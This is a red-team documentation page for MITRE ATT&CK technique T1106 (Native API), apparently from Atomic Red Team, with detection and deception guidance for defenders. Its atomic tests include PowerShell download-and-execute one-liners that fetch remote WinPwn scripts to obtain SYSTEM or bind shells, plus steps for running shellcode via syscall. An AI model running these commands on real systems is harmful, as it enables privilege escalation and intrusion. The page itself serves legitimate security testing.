Ctrl+K

T1106 - Native API

T1106 - Native API#

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

Adversaries may abuse these OS API functions as a means of executing behaviors. Similar to Command and Scripting Interpreter, the native API and its hierarchy of interfaces provide mechanisms to interact with and utilize various components of a victimized system.

Native API functions (such as NtCreateProcess) may be directed invoked via system calls / syscalls, but these features are also often exposed to user-mode applications via interfaces and libraries.(Citation: OutFlank System Calls)(Citation: CyberBit System Calls)(Citation: MDSec System Calls) For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)

Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)

Adversaries may use assembly to directly or in-directly invoke syscalls in an attempt to subvert defensive sensors and detection signatures such as user mode API-hooks.(Citation: Redops Syscalls) Adversaries may also attempt to tamper with sensors and defensive tools associated with API monitoring, such as unhooking monitored functions via Disable or Modify Tools.

Atomic Tests#

Atomic Test #1 - Execution through API - CreateProcess#

Execute program by leveraging Win32 API’s. By default, this will launch calc.exe from the command prompt. Supported Platforms: windows

Dependencies: Run with powershell!#

Description: #{source_file} must exist on system.#
Check Prereq Commands:#
if (Test-Path "PathToAtomicsFolder\T1106\src\CreateProcess.cs") {exit 0} else {exit 1}
Get Prereq Commands:#
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1106\src\CreateProcess.cs") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1106/src/CreateProcess.cs" -OutFile "PathToAtomicsFolder\T1106\src\CreateProcess.cs"


Invoke-AtomicTest T1106 -TestNumbers 1 -GetPreReqs

Attack Commands: Run with command_prompt#

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:"%tmp%\T1106.exe" /target:exe "PathToAtomicsFolder\T1106\src\CreateProcess.cs"
%tmp%/T1106.exe

Invoke-AtomicTest T1106 -TestNumbers 1

Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess techniqueGet SYSTEM shell - Pop System Shell using CreateProcess technique via function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystem.ps1')```

Invoke-AtomicTest T1106 -TestNumbers 2

Atomic Test #3 - WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess techniqueGet SYSTEM shell - Bind System Shell using CreateProcess technique via function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/CreateProcess/Get-CreateProcessSystemBind.ps1')```

Invoke-AtomicTest T1106 -TestNumbers 3

Atomic Test #4 - WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation techniqueGet SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique via function of WinPwnSupported Platforms: windows#### Attack Commands: Run with powershell#

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/NamedPipe/NamedPipeSystem.ps1')```

Invoke-AtomicTest T1106 -TestNumbers 4

Atomic Test #5 - Run Shellcode via Syscall in GoRuns shellcode in the current running process via a syscall.#

Steps taken with this technique

  1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write

  2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space

  3. Change the memory page permissions to Execute/Read with VirtualProtect

  4. Use syscall to execute the entrypoint of the shellcode

  • PoC Credit: (Ne0nd0g/go-shellcode) Supported Platforms: windows Elevation Required (e.g. root or admin)#### Attack Commands: Run with powershell

$PathToAtomicsFolder\T1106\bin\x64\syscall.exe -debug

Invoke-AtomicTest T1106 -TestNumbers 5

Cleanup:#

Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue```

Invoke-AtomicTest T1106 -TestNumbers 5 -Cleanup

Detection#

Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient.

Utilization of the Windows APIs may involve processes loading/accessing system DLLs associated with providing called functions (ex: ntdll.dll, kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity.

Shield Active Defense#

Software Manipulation#

Make changes to a system’s software properties and functions to achieve a desired effect.

Software Manipulation allows a defender to alter or replace elements of the operating system, file system, or any other software installed and executed on a system.

Opportunity#

There is an opportunity for the defender to observe the adversary and control what they can see, what effects they can have, and/or what data they can access.

Use Case#

A defender can modify system calls to break communications, route things to decoy systems, prevent full execution, etc.

Procedures#

Hook the Win32 Sleep() function so that it always performs a Sleep(1) instead of the intended duration. This can increase the speed at which dynamic analysis can be performed when a normal malicious file sleeps for long periods before attempting additional capabilities. Hook the Win32 NetUserChangePassword() and modify it such that the new password is different from the one provided. The data passed into the function is encrypted along with the modified new password, then logged so a defender can get alerted about the change as well as decrypt the new password for use. Alter the output of an adversary’s profiling commands to make newly-built systems look like the operating system was installed months earlier. Alter the output of adversary recon commands to not show important assets, such as a file server containing sensitive data.

Contents